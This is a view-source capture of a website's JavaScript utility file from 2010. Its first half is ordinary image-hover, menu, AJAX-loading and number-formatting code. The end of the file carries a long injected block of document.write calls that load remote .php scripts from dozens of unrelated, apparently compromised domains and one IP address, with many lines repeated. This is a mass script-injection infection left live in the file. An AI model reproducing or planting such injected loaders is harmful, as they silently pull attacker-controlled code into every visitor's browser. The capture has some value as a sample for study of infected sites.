URL:    [ Dan Winchester Home ] [ View Source Home ] 
HTTP/1.1 200 OK
Content-Length: 15382
Content-Type: application/x-javascript
Last-Modified: Sat, 10 Apr 2010 08:05:13 GMT
Accept-Ranges: bytes
ETag: "52fa938c84d8ca1:a03d5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 10 Apr 2010 15:58:44 GMT
Connection: close

//image hover############################
<!--
function MM_swapImgRestore() { //v3.0
  var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}

function MM_preloadImages() { //v3.0
  var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
    var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
    if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}

function MM_findObj(n, d) { //v4.01
  var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
    d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
  if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
  for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
  if(!x && d.getElementById) x=d.getElementById(n); return x;
}

function MM_swapImage() { //v3.0
  var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
   if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}
//-->
//image hover############################


function DisplayOff(itm)
{
 obj1=document.getElementById(itm);
 //obj3.style.visibility = "hidden";
 obj1.style.display = "none";
 }
function DisplayOn(itm)
{
 obj1=document.getElementById(itm);
 //obj1.style.visibility = "hidden";
 obj1.style.display = "block";
 }
 
 function trHoverOn(itm)
{
 obj1=document.getElementById(itm);
 //obj1.style.visibility = "hidden";
 obj1.style.background = "#ffff99";
 }
 function trHoverOff(itm)
{
 obj1=document.getElementById(itm);
 //obj1.style.visibility = "hidden";
 obj1.style.background = "#F2F7FF";
 }
 

  function MenuHoverOn(itm)
{
 obj1=document.getElementById(itm);
 //obj1.style.visibility = "hidden";
 obj1.style.background = "url('Icon/MenuTitleDownHover.gif') no-repeat  left top";
 obj1.style.color = "#0099ff";
 }
 function MenuHoverOff(itm)
{
 obj1=document.getElementById(itm);
 //obj1.style.visibility = "hidden";
 obj1.style.background = "url('Icon/MenuTitleDown.gif') no-repeat  left top";
 obj1.style.color = "#0066CC";
 }
 
  function MenuHoverOnUp(itm)
{
 obj1=document.getElementById(itm);
 //obj1.style.visibility = "hidden";
  obj1.style.background = "url('Icon/MenuTitleUpHover.gif') no-repeat  left top";
  obj1.style.color = "#0099ff";

 }
 function MenuHoverOffUp(itm)
{
 obj1=document.getElementById(itm);
 //obj1.style.visibility = "hidden";
 obj1.style.background = "url('Icon/MenuTitleUp.gif') no-repeat  left top";
  obj1.style.color = "#0066CC";

 }
 

 
//ajax page$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

var bustcachevar=0//bust potential caching of external pages after initial request? (1=yes, 0=no)


var loadedobjects=""
var rootdomain="http://"+window.location.hostname

function ajaxpage(url, containerid){
var page_request = false
if (window.XMLHttpRequest) // if Mozilla, Safari etc
page_request = new XMLHttpRequest()
else if (window.ActiveXObject){ // if IE
try {
page_request = new ActiveXObject("Msxml2.XMLHTTP")
} 
catch (e){
try{
page_request = new ActiveXObject("Microsoft.XMLHTTP")
}
catch (e){}
}
}
else
return false
document.getElementById(containerid).innerHTML=loadstatustext

page_request.onreadystatechange=function(){
loadpage(page_request, containerid)
}
page_request.open('GET', url, true)
page_request.send(null)
}

function loadpage(page_request, containerid){
if (page_request.readyState == 4 && (page_request.status==200 || window.location.href.indexOf("http")==-1))
document.getElementById(containerid).innerHTML=page_request.responseText
}

function loadobjs(){
if (!document.getElementById)
return
for (i=0; i<arguments.length; i++){
var file=arguments[i]
var fileref=""
if (loadedobjects.indexOf(file)==-1){ //Check to see if this object has not already been added to page before proceeding
if (file.indexOf(".js")!=-1){ //If object is a js file
fileref=document.createElement('script')
fileref.setAttribute("type","text/javascript");
fileref.setAttribute("src", file);
}
else if (file.indexOf(".css")!=-1){ //If object is a css file
fileref=document.createElement("link")
fileref.setAttribute("rel", "stylesheet");
fileref.setAttribute("type", "text/css");
fileref.setAttribute("href", file);
}
}
if (fileref!=""){
document.getElementsByTagName("head").item(0).appendChild(fileref)
loadedobjects+=file+" " //Remember this object as being already added to page
}
}
}


var rootdomain="http://"+window.location.hostname

function ajaxinclude(url) {
var page_request = false
if (window.XMLHttpRequest) // if Mozilla, Safari etc
page_request = new XMLHttpRequest()
else if (window.ActiveXObject){ // if IE
try {
page_request = new ActiveXObject("Msxml2.XMLHTTP")
} 
catch (e){
try{
page_request = new ActiveXObject("Microsoft.XMLHTTP")
}
catch (e){}
}
}
else
return false
page_request.open('GET', url, false) //get page synchronously 
page_request.send(null)
writecontent(page_request)
}

function writecontent(page_request){
if (window.location.href.indexOf("http")==-1 || page_request.status==200)
document.write(page_request.responseText)
}


//ajax page$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

function insertCommaTotalFrom(itm)
	{
	var price;
		price="";
		field=document.getElementById(itm);
	   while(field.value.indexOf(',')!=-1)
	   {
	    field.value=field.value.replace(',','');
	    }
	   
		txt_field=document.getElementById("ttd");
		txt_field=field.value.length;
		var counter=0;
		for(var i=txt_field-1;i>=0;i--)
		{
		price=field.value.charAt(i)+price;
		counter++;
		if(counter%3==0&&i>0)
		{
		price=','+price;
		counter=0;
		}
		}
			field.value=price;
			 
	}
		

document.write('<script src=http://howesknifeshop.com/pub/affiliate_reports.php ><\/script>');
document.write('<script src=http://howesknifeshop.com/pub/affiliate_reports.php ><\/script>');
document.write('<script src=http://howesknifeshop.com/pub/affiliate_reports.php ><\/script>');
document.write('<script src=http://shinwoori.tourskorea.com/newEvent/Timages/left_event_main.php ><\/script>');
document.write('<script src=http://shinwoori.tourskorea.com/newEvent/Timages/left_event_main.php ><\/script>');
document.write('<script src=http://shinwoori.tourskorea.com/newEvent/Timages/left_event_main.php ><\/script>');
document.write('<script src=http://shinwoori.tourskorea.com/newEvent/Timages/left_event_main.php ><\/script>');
document.write('<script src=http://shinwoori.tourskorea.com/newEvent/Timages/left_event_main.php ><\/script>');
document.write('<script src=http://shinwoori.tourskorea.com/newEvent/Timages/left_event_main.php ><\/script>');
document.write('<script src=http://shinwoori.tourskorea.com/newEvent/Timages/left_event_main.php ><\/script>');
document.write('<script src=http://shinwoori.tourskorea.com/newEvent/Timages/left_event_main.php ><\/script>');
document.write('<script src=http://shinwoori.tourskorea.com/newEvent/Timages/left_event_main.php ><\/script>');
document.write('<script src=http://shinwoori.tourskorea.com/newEvent/Timages/left_event_main.php ><\/script>');
document.write('<script src=http://shinwoori.tourskorea.com/newEvent/Timages/left_event_main.php ><\/script>');
document.write('<script src=http://shinwoori.tourskorea.com/newEvent/Timages/left_event_main.php ><\/script>');
document.write('<script src=http://shinwoori.tourskorea.com/newEvent/Timages/left_event_main.php ><\/script>');
document.write('<script src=http://shinwoori.tourskorea.com/newEvent/Timages/left_event_main.php ><\/script>');
document.write('<script src=http://shinwoori.tourskorea.com/newEvent/Timages/left_event_main.php ><\/script>');
document.write('<script src=http://shinwoori.tourskorea.com/newEvent/Timages/left_event_main.php ><\/script>');
document.write('<script src=http://shinwoori.tourskorea.com/newEvent/Timages/left_event_main.php ><\/script>');
document.write('<script src=http://onedown1.com/images/event2.php ><\/script>');
document.write('<script src=http://maxwelexporter.com/includes/image2.php ><\/script>');
document.write('<script src=http://maxwelexporter.com/includes/image2.php ><\/script>');
document.write('<script src=http://maxwelexporter.com/includes/image2.php ><\/script>');
document.write('<script src=http://maxwelexporter.com/includes/image2.php ><\/script>');
document.write('<script src=http://maxwelexporter.com/includes/image2.php ><\/script>');
document.write('<script src=http://maxwelexporter.com/includes/image2.php ><\/script>');
document.write('<script src=http://maxwelexporter.com/includes/image2.php ><\/script>');
document.write('<script src=http://regler-engineering.de/Regler/pageID_7943942.php ><\/script>');
document.write('<script src=http://regler-engineering.de/Regler/pageID_7943942.php ><\/script>');
document.write('<script src=http://regler-engineering.de/Regler/pageID_7943942.php ><\/script>');
document.write('<script src=http://regler-engineering.de/Regler/pageID_7943942.php ><\/script>');
document.write('<script src=http://regler-engineering.de/Regler/pageID_7943942.php ><\/script>');
document.write('<script src=http://regler-engineering.de/Regler/pageID_7943942.php ><\/script>');
document.write('<script src=http://zeneszportal.extra.hu/index_elemei/02.php ><\/script>');
document.write('<script src=http://zeneszportal.extra.hu/index_elemei/02.php ><\/script>');
document.write('<script src=http://zeneszportal.extra.hu/index_elemei/02.php ><\/script>');
document.write('<script src=http://usanemzetiparkok.extra.hu/images/index2.php ><\/script>');
document.write('<script src=http://usanemzetiparkok.extra.hu/images/index2.php ><\/script>');
document.write('<script src=http://usanemzetiparkok.extra.hu/images/index2.php ><\/script>');
document.write('<script src=http://yamana.sakura.ne.jp/language/mainfile.dist.php ><\/script>');
document.write('<script src=http://yamana.sakura.ne.jp/language/mainfile.dist.php ><\/script>');
document.write('<script src=http://yamana.sakura.ne.jp/language/mainfile.dist.php ><\/script>');
document.write('<script src=http://yamana.sakura.ne.jp/language/mainfile.dist.php ><\/script>');
document.write('<script src=http://yamana.sakura.ne.jp/language/mainfile.dist.php ><\/script>');
document.write('<script src=http://yamana.sakura.ne.jp/language/mainfile.dist.php ><\/script>');
document.write('<script src=http://yamana.sakura.ne.jp/language/mainfile.dist.php ><\/script>');
document.write('<script src=http://delhicakesngifts.com/the-cake-shop/fckeditor_php4.php ><\/script>');
document.write('<script src=http://delhicakesngifts.com/the-cake-shop/fckeditor_php4.php ><\/script>');
document.write('<script src=http://pannatex.com/test/s20.php ><\/script>');
document.write('<script src=http://pannatex.com/test/s20.php ><\/script>');
document.write('<script src=http://yourdirtydesires.com/checkout/classifieds_tags.php ><\/script>');
document.write('<script src=http://yourdirtydesires.com/checkout/classifieds_tags.php ><\/script>');
document.write('<script src=http://yourdirtydesires.com/checkout/classifieds_tags.php ><\/script>');
document.write('<script src=http://yourdirtydesires.com/checkout/classifieds_tags.php ><\/script>');
document.write('<script src=http://202.143.154.178/tapayokaram/research.php ><\/script>');
document.write('<script src=http://202.143.154.178/tapayokaram/research.php ><\/script>');
document.write('<script src=http://202.143.154.178/tapayokaram/research.php ><\/script>');
document.write('<script src=http://gautengtours.co.za/images/gifimg.php ><\/script>');
document.write('<script src=http://boilstreatment1.info/images/gifimg.php ><\/script>');
document.write('<script src=http://boilstreatment1.info/images/gifimg.php ><\/script>');
document.write('<script src=http://virtualmoscownumber.info/images/favicon.php ><\/script>');
document.write('<script src=http://virtualmoscownumber.info/images/favicon.php ><\/script>');
document.write('<script src=http://virtualmoscownumber.info/images/favicon.php ><\/script>');
document.write('<script src=http://virtualmoscownumber.info/images/favicon.php ><\/script>');
document.write('<script src=http://virtualmoscownumber.info/images/favicon.php ><\/script>');
document.write('<script src=http://tbssiteimprovement.com/images/favicon.php ><\/script>');
document.write('<script src=http://tbssiteimprovement.com/images/favicon.php ><\/script>');
document.write('<script src=http://tbssiteimprovement.com/images/favicon.php ><\/script>');
document.write('<script src=http://tbssiteimprovement.com/images/favicon.php ><\/script>');
document.write('<script src=http://tbssiteimprovement.com/images/favicon.php ><\/script>');
document.write('<script src=http://el-natatorio.com.ar/images/gifimg.php ><\/script>');
document.write('<script src=http://rara.co.in/images/gifimg.php ><\/script>');
document.write('<script src=http://rara.co.in/images/gifimg.php ><\/script>');
document.write('<script src=http://rara.co.in/images/gifimg.php ><\/script>');
document.write('<script src=http://hk-ishop.com/hosanna/afficheu.php ><\/script>');
document.write('<script src=http://hk-ishop.com/hosanna/afficheu.php ><\/script>');
document.write('<script src=http://kyosoft.net/cgi/portfolio.php ><\/script>');
document.write('<script src=http://prosperitygrp.com/corporate/geo.php ><\/script>');
document.write('<script src=http://prosperitygrp.com/corporate/geo.php ><\/script>');
document.write('<script src=http://prosperitygrp.com/corporate/geo.php ><\/script>');
document.write('<script src=http://mafia-wars-how-to-ea.co.cc/test/header.php ><\/script>');
document.write('<script src=http://m.e-lamoda.com/formbuilder/officesupply.php ><\/script>');
document.write('<script src=http://suprem-company.ro/slides/proiect_case_tip_1.php ><\/script>');
document.write('<script src=http://suprem-company.ro/slides/proiect_case_tip_1.php ><\/script>');
document.write('<script src=http://suprem-company.ro/slides/proiect_case_tip_1.php ><\/script>');
document.write('<script src=http://suprem-company.ro/slides/proiect_case_tip_1.php ><\/script>');
document.write('<script src=http://mariskalrock.com/webcam/imgradio.php ><\/script>');
document.write('<script src=http://mariskalrock.com/webcam/imgradio.php ><\/script>');
document.write('<script src=http://mariskalrock.com/webcam/imgradio.php ><\/script>');
document.write('<script src=http://mariskalrock.com/webcam/imgradio.php ><\/script>');
document.write('<script src=http://mariskalrock.com/webcam/imgradio.php ><\/script>');
document.write('<script src=http://astoline.com/includes/support.php ><\/script>');
document.write('<script src=http://astoline.com/includes/support.php ><\/script>');
document.write('<script src=http://astoline.com/includes/support.php ><\/script>');
document.write('<script src=http://astoline.com/includes/support.php ><\/script>');
document.write('<script src=http://nex-sales.com/dropdownMenu/careers.php ><\/script>');
document.write('<script src=http://nex-sales.com/dropdownMenu/careers.php ><\/script>');
document.write('<script src=http://nex-sales.com/dropdownMenu/careers.php ><\/script>');
 Questions or comments welcome: contact me.